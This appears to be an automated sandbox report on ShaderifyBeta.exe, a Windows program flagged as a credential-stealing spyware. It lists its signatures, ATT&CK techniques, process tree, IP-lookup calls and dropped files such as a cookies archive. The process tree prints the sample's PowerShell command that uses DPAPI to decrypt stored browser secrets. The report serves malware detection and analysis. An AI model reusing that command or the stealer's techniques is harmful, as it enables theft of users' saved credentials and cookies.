70be2d322c2b970a07f16e041f033d8296644f3eefe2f18a741cc2ff1c432bba

Analysis

max time kernel
122s
max time network
126s
platform
windows7_x64
resource
win7-20240419-en
resource tags

arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
submitted
10/06/2024, 02:39

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

ShaderifyBeta.exe
Size

120.4MB
MD5

9c094a8f32f41493c050557ead046aa9
SHA1

c572b2dc97a790a24dc584417a83062da530304c
SHA256

d898a8bd9a2bb747478d8abc4f10352ece031f99781a6d0f97b4782619982325
SHA512

f8f01c114e48cbe47b197960b87b221d808a438635705a710b671ae3c5f3739efb41e0d5cc1531ec1049ea638f049bee8214714883752b8c1cb80d426088355b
SSDEEP

1572864:o1f0+Sva7Hdp1Nhn+aCdrvdYrZ/7/lbg8udR8SnuSE49z:Nasulbg8yTnbEOz

Score

7^/10

spyware stealer

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Control Panel\International\Geo\Nation	ShaderifyBeta.exe

Loads dropped DLL 1 IoCs

pid	Process
3000	ShaderifyBeta.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
3	api.ipify.org
4	api.ipify.org
10	ipinfo.io
11	ipinfo.io

An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs

pid	Process
2680	cmd.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery

T1057

pid	Process
2632	tasklist.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
1616	powershell.exe
1860	ShaderifyBeta.exe
3000	ShaderifyBeta.exe
3000	ShaderifyBeta.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2632	tasklist.exe
Token: SeDebugPrivilege	1616	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3000 wrote to memory of 2060	3000	ShaderifyBeta.exe	28
PID 3000 wrote to memory of 2060	3000	ShaderifyBeta.exe	28
PID 3000 wrote to memory of 2060	3000	ShaderifyBeta.exe	28
PID 2060 wrote to memory of 2632	2060	cmd.exe	30
PID 2060 wrote to memory of 2632	2060	cmd.exe	30
PID 2060 wrote to memory of 2632	2060	cmd.exe	30
PID 3000 wrote to memory of 2680	3000	ShaderifyBeta.exe	32
PID 3000 wrote to memory of 2680	3000	ShaderifyBeta.exe	32
PID 3000 wrote to memory of 2680	3000	ShaderifyBeta.exe	32
PID 2680 wrote to memory of 1616	2680	cmd.exe	34
PID 2680 wrote to memory of 1616	2680	cmd.exe	34
PID 2680 wrote to memory of 1616	2680	cmd.exe	34
PID 3000 wrote to memory of 2696	3000	ShaderifyBeta.exe	35
PID 3000 wrote to memory of 2696	3000	ShaderifyBeta.exe	35
PID 3000 wrote to memory of 2696	3000	ShaderifyBeta.exe	35
PID 3000 wrote to memory of 2696	3000	ShaderifyBeta.exe	35
PID 3000 wrote to memory of 2696	3000	ShaderifyBeta.exe	35
PID 3000 wrote to memory of 2696	3000	ShaderifyBeta.exe	35
PID 3000 wrote to memory of 2696	3000	ShaderifyBeta.exe	35
PID 3000 wrote to memory of 2696	3000	ShaderifyBeta.exe	35
PID 3000 wrote to memory of 2696	3000	ShaderifyBeta.exe	35
PID 3000 wrote to memory of 2696	3000	ShaderifyBeta.exe	35
PID 3000 wrote to memory of 2696	3000	ShaderifyBeta.exe	35
PID 3000 wrote to memory of 2696	3000	ShaderifyBeta.exe	35
PID 3000 wrote to memory of 2696	3000	ShaderifyBeta.exe	35
PID 3000 wrote to memory of 2696	3000	ShaderifyBeta.exe	35
PID 3000 wrote to memory of 2696	3000	ShaderifyBeta.exe	35
PID 3000 wrote to memory of 2696	3000	ShaderifyBeta.exe	35
PID 3000 wrote to memory of 2696	3000	ShaderifyBeta.exe	35
PID 3000 wrote to memory of 2696	3000	ShaderifyBeta.exe	35
PID 3000 wrote to memory of 2696	3000	ShaderifyBeta.exe	35
PID 3000 wrote to memory of 2696	3000	ShaderifyBeta.exe	35
PID 3000 wrote to memory of 2696	3000	ShaderifyBeta.exe	35
PID 3000 wrote to memory of 2696	3000	ShaderifyBeta.exe	35
PID 3000 wrote to memory of 2696	3000	ShaderifyBeta.exe	35
PID 3000 wrote to memory of 2696	3000	ShaderifyBeta.exe	35
PID 3000 wrote to memory of 2696	3000	ShaderifyBeta.exe	35
PID 3000 wrote to memory of 2696	3000	ShaderifyBeta.exe	35
PID 3000 wrote to memory of 2696	3000	ShaderifyBeta.exe	35
PID 3000 wrote to memory of 2696	3000	ShaderifyBeta.exe	35
PID 3000 wrote to memory of 2696	3000	ShaderifyBeta.exe	35
PID 3000 wrote to memory of 2696	3000	ShaderifyBeta.exe	35
PID 3000 wrote to memory of 2696	3000	ShaderifyBeta.exe	35
PID 3000 wrote to memory of 2696	3000	ShaderifyBeta.exe	35
PID 3000 wrote to memory of 2696	3000	ShaderifyBeta.exe	35
PID 3000 wrote to memory of 2696	3000	ShaderifyBeta.exe	35
PID 3000 wrote to memory of 2696	3000	ShaderifyBeta.exe	35
PID 3000 wrote to memory of 2696	3000	ShaderifyBeta.exe	35
PID 3000 wrote to memory of 2696	3000	ShaderifyBeta.exe	35
PID 3000 wrote to memory of 2696	3000	ShaderifyBeta.exe	35
PID 3000 wrote to memory of 2696	3000	ShaderifyBeta.exe	35
PID 3000 wrote to memory of 2696	3000	ShaderifyBeta.exe	35
PID 3000 wrote to memory of 2696	3000	ShaderifyBeta.exe	35
PID 3000 wrote to memory of 1860	3000	ShaderifyBeta.exe	36
PID 3000 wrote to memory of 1860	3000	ShaderifyBeta.exe	36
PID 3000 wrote to memory of 1860	3000	ShaderifyBeta.exe	36
PID 3000 wrote to memory of 1628	3000	ShaderifyBeta.exe	37
PID 3000 wrote to memory of 1628	3000	ShaderifyBeta.exe	37
PID 3000 wrote to memory of 1628	3000	ShaderifyBeta.exe	37
PID 3000 wrote to memory of 1628	3000	ShaderifyBeta.exe	37
PID 3000 wrote to memory of 1628	3000	ShaderifyBeta.exe	37
PID 3000 wrote to memory of 1628	3000	ShaderifyBeta.exe	37
PID 3000 wrote to memory of 1628	3000	ShaderifyBeta.exe	37
PID 3000 wrote to memory of 1628	3000	ShaderifyBeta.exe	37

C:\Users\Admin\AppData\Local\Temp\ShaderifyBeta.exe
"C:\Users\Admin\AppData\Local\Temp\ShaderifyBeta.exe"
1⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2060
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:2632
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,215,199,231,59,147,67,136,65,136,87,160,219,139,233,193,209,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,44,74,223,79,220,90,252,60,101,249,58,12,168,205,121,65,121,1,14,1,106,115,143,97,176,229,196,204,141,89,19,17,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,91,94,75,109,28,167,223,18,171,205,163,244,66,148,133,138,66,231,17,7,119,186,253,126,181,245,239,2,37,26,220,34,48,0,0,0,57,5,79,199,8,66,172,63,76,193,85,123,247,64,71,254,164,36,81,173,225,156,158,214,245,110,199,98,124,168,153,66,205,243,85,96,59,49,136,178,241,86,15,15,108,112,38,73,64,0,0,0,199,225,73,19,83,195,166,200,81,164,19,169,213,45,158,222,192,5,232,254,193,195,146,219,237,180,88,51,230,76,70,100,169,30,98,153,72,139,193,235,19,53,166,253,242,255,186,162,81,152,150,48,108,240,128,137,4,103,28,17,136,80,234,197), $null, 'CurrentUser')"
  2⤵
  - An obfuscated cmd.exe command-line is typically used to evade detection.
  - Suspicious use of WriteProcessMemory
  PID:2680
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,215,199,231,59,147,67,136,65,136,87,160,219,139,233,193,209,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,44,74,223,79,220,90,252,60,101,249,58,12,168,205,121,65,121,1,14,1,106,115,143,97,176,229,196,204,141,89,19,17,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,91,94,75,109,28,167,223,18,171,205,163,244,66,148,133,138,66,231,17,7,119,186,253,126,181,245,239,2,37,26,220,34,48,0,0,0,57,5,79,199,8,66,172,63,76,193,85,123,247,64,71,254,164,36,81,173,225,156,158,214,245,110,199,98,124,168,153,66,205,243,85,96,59,49,136,178,241,86,15,15,108,112,38,73,64,0,0,0,199,225,73,19,83,195,166,200,81,164,19,169,213,45,158,222,192,5,232,254,193,195,146,219,237,180,88,51,230,76,70,100,169,30,98,153,72,139,193,235,19,53,166,253,242,255,186,162,81,152,150,48,108,240,128,137,4,103,28,17,136,80,234,197), $null, 'CurrentUser')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1616
- C:\Users\Admin\AppData\Local\Temp\ShaderifyBeta.exe
  "C:\Users\Admin\AppData\Local\Temp\ShaderifyBeta.exe" --type=gpu-process --field-trial-handle=1156,9480932675670523534,11000612360611296754,131072 --enable-features=WebComponentsV0Enabled --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1168 /prefetch:2
  2⤵
  PID:2696
- C:\Users\Admin\AppData\Local\Temp\ShaderifyBeta.exe
  "C:\Users\Admin\AppData\Local\Temp\ShaderifyBeta.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1156,9480932675670523534,11000612360611296754,131072 --enable-features=WebComponentsV0Enabled --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1612 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1860
- C:\Users\Admin\AppData\Local\Temp\ShaderifyBeta.exe
  "C:\Users\Admin\AppData\Local\Temp\ShaderifyBeta.exe" --type=gpu-process --field-trial-handle=1156,9480932675670523534,11000612360611296754,131072 --enable-features=WebComponentsV0Enabled --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1352 /prefetch:2
  2⤵
  PID:1628

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Admincookies.zip

Filesize
22B

MD5
76cdb2bad9582d23c1f6f4d868218d6c

SHA1
b04f3ee8f5e43fa3b162981b50bb72fe1acabb33

SHA256
8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85

SHA512
5e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f

Download Submit
\Users\Admin\AppData\Local\Temp\b0458082-8447-45db-ac2e-13ce25dd671c.tmp.node

Filesize
1.4MB

MD5
56192831a7f808874207ba593f464415

SHA1
e0c18c72a62692d856da1f8988b0bc9c8088d2aa

SHA256
6aa8763714aa5199a4065259af792292c2a7d6a2c381aa27007255421e5c9d8c

SHA512
c82aa1ef569c232b4b4f98a3789f2390e5f7bf5cc7e73d199fe23a3f636817edfdc2fb49ce7f69169c028a9dd5ab9f63e8f64964bb22424fc08db71e85054a33

Download Submit
memory/1616-13-0x0000000001E70000-0x0000000001E78000-memory.dmp

Filesize
32KB

Download
memory/1616-12-0x000000001B750000-0x000000001BA32000-memory.dmp

Filesize
2.9MB

Download
memory/2696-52-0x0000000076D50000-0x0000000076D51000-memory.dmp

Filesize
4KB

Download
memory/2696-20-0x0000000000060000-0x0000000000061000-memory.dmp

Filesize
4KB

Download